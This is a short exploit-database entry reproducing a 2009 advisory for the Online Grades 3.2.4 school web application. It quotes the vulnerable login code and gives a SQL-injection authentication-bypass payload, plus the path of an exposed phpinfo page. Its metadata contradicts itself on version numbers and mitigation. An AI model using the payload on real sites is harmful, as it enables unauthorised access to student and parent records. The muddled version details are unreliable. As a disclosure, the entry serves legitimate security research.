header-logo
Suggest Exploit
vendor:
Online Grades 3.2.4
by:
x0r
7.5
CVSS
HIGH
Auth Bypass - Php Info Disclosure
89
CWE
Product Name: Online Grades 3.2.4
Affected Version From: 3.2.2004
Affected Version To: 3.2.2004
Patch Exists: Yes
Related CWE: N/A
CPE: a:onlinegrades:online_grades
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Online Grades 3.2.4 Auth Bypass – Php Info Disclosure

A vulnerability exists in Online Grades 3.2.4 which allows an attacker to bypass authentication and gain access to the phpinfo.php file. This is done by sending a specially crafted POST request to the login.php page with the username and password fields set to '[validemail] ' or ' 1=1--'

Mitigation:

Upgrade to the latest version of Online Grades 3.2.4
Source

Exploit-DB raw data:

#########################################################################################

    [0x01] Informations: 
	Script : Online Grades 3.2.4 
	Download : http://www.onlinegrades.org 
	Vulnerability : Auth Bypass - Php Info Disclosure 
	Author : x0r 
	Contact : x0r@live.it \ andry2000@hotmail.it 
	Website : NULL 

#########################################################################################

    [0x02] Bug: /parents/login.php 
	
	$username = $_POST['uname']; $pword = $_POST['pass']; 
	$mysql_query = "SELECT * from PARENTS where client_id = '$username' and
client_pw = '$pword';"; 

#########################################################################################

    [0x03] Exploit: 
	Exploit: [validemail] ' or ' 1=1-- 
	
	Php Info: /includes/phpinfo.php 

#########################################################################################

# milw0rm.com [2009-02-03]